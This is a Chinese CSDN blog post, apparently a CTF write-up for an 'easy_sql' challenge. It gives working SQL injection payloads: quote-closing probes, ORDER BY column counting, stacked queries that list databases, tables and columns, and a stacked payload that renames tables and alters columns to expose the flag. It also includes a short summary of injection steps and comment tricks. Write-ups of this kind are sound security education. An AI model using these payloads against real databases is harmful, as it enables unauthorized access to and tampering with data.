easy_sql

最新推荐文章于 2024-04-24 18:27:59 发布
最新推荐文章于 2024-04-24 18:27:59 发布
阅读量302 收藏 2
点赞数
文章标签: sql 数据库 mybatis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73861475/article/details/132722084
版权

首先判断sql注入,

输入1,2都有回显,输入3没有回显

输入1

输入1'

输入1'#,发现这里是单引号闭合,sql注入是字符型

接着测试字段  1' order by 1 #,到3时报错,则字段数为2

尝试联合查询注入,1' union select 1,2#,发现被过滤了

那就用堆叠注入,先尝试爆数据库,0'; show databases; #

在尝试报表,0'; show tables; #

这里发现两个表,将这两个表爆出来,

1'; show columns from words; #

0'; show columns from 1919810931114514 ; #

但是在爆破数字表名的这个表却没有回显,这里我看了别人的wp

进行以下操作:

1.将words表改名为word1或其它任意名字

2.1919810931114514改名为words

3.将新的word表插入一列,列名为id

4.将flag列改名为data

构造payload

1’;rename table words to word1;rename table 1919810931114514 to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#

接着我们再用1,查询就得到flag

联合查询注入流程:

1、判断有无闭合 ,1,1‘,1’#

2、猜解字段 order by 10 //采用二分法

3、判断数据回显位置 -1 union select 1,2,3,4,5.... //参数等号后面加-表示不显示当前数据

4、获取当前数据库名、用户、版本   union select version(),database(),user(),

紧接着就获取数据库名,表名及数据

堆叠注入:

目标存在sql注入漏洞

目标未对";"号进行过滤

目标中间层查询数据库信息时可同时执行多条sql语句

常见注释:

单行注释:使用"--"符号,后面的内容将被注释掉。
多行注释:使用"/* */"符号,其中的内容将被注释掉。
分段注释:可以通过在SQL语句中间添加注释符号来隐藏攻击代码,例如使用")--"或")/*"。
特殊符号注释:通过使用特殊符号来实现注释,例如在MySQL中,可以使用"#"符号来注释掉后面的内容。

 

正在努力中的小白♤
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C#中的Easy SQL-CE Access Utility
04-11
仅使用C#中的一行代码即可访问任何SQL Server Compact Edition数据表中的数据
buu easysql(真的easy吗)
qq_46485934的博客
09-26 2057
这道题让我了解到了两个东西,堆叠注入和set sql_mode=PIPES_AS_CONCAT 一.分析回显 题目为easysql,所以这道题是sql注入题没跑了。按老规矩测试, 输入1,回显 Array ( [0] => 1 ) 输入2,3, 4, 5…,回显都为 Array ( [0] => 1 ) 于是,输入0试试,无回显 心里想(???,这不会是sql盲注吧,1及1以上有回显,0则无回显) 接着我就用burpsuite fuzz了一下,基本全被过滤,and or &&amp
BUUCTF-随便注(easy_sql
weixin_51383898的博客
10-13 289
启动靶机,首先有一个输入框,提交查询,返回一个数组将数值改成3,页面没有显示输入2,有结果,最大输入为2输入1'出现报错,参数为字符型,需要闭合单引号出现报错,尝试报错注入,被过滤了使用联合注入,过滤了关键字select,没有用尝试使用万能语句,好像没啥用,得到的信息和flag没有关联尝试使用堆叠注入,成功了发现有个数据库,查看该数据库下有哪些表有个FLAG_TABLE表,查看table表有哪些字段不是flag???,看来这个数据库不得行进入supersqli。
buuctf [极客大挑战 2019]EasySQL1(新手向)
wwllzz683的博客
10-26 237
记一下就好以后在测试注入漏洞是可以用到,,,这个记法也很简单他是吧”or“和”=“用。点开连接后一个很有黑客风格的页面,有用户名和密码两个输入框。这些固定的flag不同,大多数都是一人一flag。的web题,输入admin基本上都是对的)根据题目Easy SQL,就知道需要用到。输入后,点击登录,flag就出来了。(这个是sql注入中的”注意:web的flag和。‘ 给包含起来了)密码学(crypto)
攻防世界 -- very_easy_sql
weixin_48031371的博客
09-14 7280
攻防世界 -- very_easy_sql
SQL查询重复数据和清除重复数据
热门推荐
rockyvan的专栏
05-20 10万+
选择重复,消除重复和选择出序列 有例表:emp emp_no   name    age         001           Tom      17         002           Sun       14         003           Tom      15         004           Tom      16 要求: 列出所有
easy_sql解析
qq_73722777的博客
03-08 382
获得列名,但是其中不包含flag项。先尝试打开username和password列查看数据。进入页面,我们看到网页标题为管理员后台,尝试使用万能密码进行登录。回显输入为3时可以正常登录,回显为4显示错误,推测回显位为3。登录后发现登录成功,网页有回显,尝试进行sql注入。网址回显错误,猜测空格被屏蔽,使用/**/代替尝试。获得表名为bighacker,users。爆数据后未发现flag,于是尝试从另一个表入手。获得库名为yunxi_exam,进行爆表名。获得flag,此题结束。得到列名,尝试爆数据。
[SUCTF 2019]EasySQL
记录学习,一起进步
01-13 1625
[SUCTF 2019]EasySQL
攻防世界web新手 - very_easy_sql(非常详细的wp)
yuanxu8877的博客
11-27 6490
攻防世界web新手 - very_easy_sql(非常详细的wp),希望大家不要吝啬您的点赞收藏哦。
CTF练习题
weixin_62707591的博客
05-08 740
Rabbit 序列密码是一种基于混沌理论的加密算法,它利用了混沌系统的随机性和不可预测性来保护数据的安全性。Rabbit 序列密码的安全性主要来自于混沌系统的随机性和不可预测性,使得攻击者无法通过破解算法或暴力破解的方式来获取密钥和明文。签名即标志着该文件是由支持 rar4.x 版本的软件压缩而成,如果使用支持 5.0 版本的压缩软件压缩,其签名可能会不同。要枚举的DBMS数据库表列(s)
简易SQL----Easy
09-07
简单化SQL增删改查,支持Access数据库。 可复制粘贴字段,方便写SQL语句。
easysql插件
02-24
eclipse的插件
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
easy_buy.sql
10-20
easy_buy.sql
easy-to-SQL.rar_easy
09-24
最易入门SQL语句教程,学习SQL语言入门文档,对初学者非常有用。
SqlDbx_easy
03-15
最简易的数据库客户端使用工具 SqlDbx is database administration and SQL development IDE focused on application developers who work in heterogeneous database environments.
SQL中top的使用
m0_57310426的博客
04-22 409
语法格式: SELECT TOP n PERCENT <列名表> FROM <表名> [查询条件]语法格式: SELECT TOP n <列名表> FROM <表名> [查询条件]其中,n为所返回的记录数所占结果集中记录数目的百分比数。1.介绍:查询最热门,最高的分的前几条数据。(2)返回结果集中指定百分比的记录数。其中,n为要返回结果集中的记录条数。2.查询成绩前10%的学生的信息。(1)返回确定数目的记录个数。1.查询成绩前十的学生的信息。
[SWPUCTF-2022-新生赛]ez_sql
最新发布
liaochonxiang的博客
04-24 371
根据提示,POST传参得到假的flag。
VisualStudio 2019 c++ SQL SERVER
04-06
Visual Studio 2019 is a powerful integrated development environment (IDE) for building applications for various platforms, including Windows, Android, iOS, and web. C is a general-purpose, procedural programming language that has been widely used for developing operating systems, embedded systems, and other system-level software. SQL Server is a relational database management system (RDBMS) developed by Microsoft. It is used to store and manage large amounts of data and provides various features such as data analytics, reporting, and business intelligence. Visual Studio 2019 provides built-in support for developing applications that use SQL Server databases. Developers can use the SQL Server Object Explorer to view and manage databases, tables, and stored procedures. They can also use LINQ to SQL, Entity Framework, and other data access technologies to query and manipulate data from SQL Server databases. Visual Studio 2019 also provides various tools for debugging and testing applications that use SQL Server databases. Developers can use the SQL Server Profiler to trace database activity and diagnose performance issues. They can also use the SQL Server Data Tools (SSDT) to create and manage database projects and automate database deployments. Overall, Visual Studio 2019 provides a comprehensive set of tools and features for developing applications that use SQL Server databases. Whether you are building a desktop application, a web application, or a mobile application, Visual Studio 2019 makes it easy to connect to SQL Server databases and work with data.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值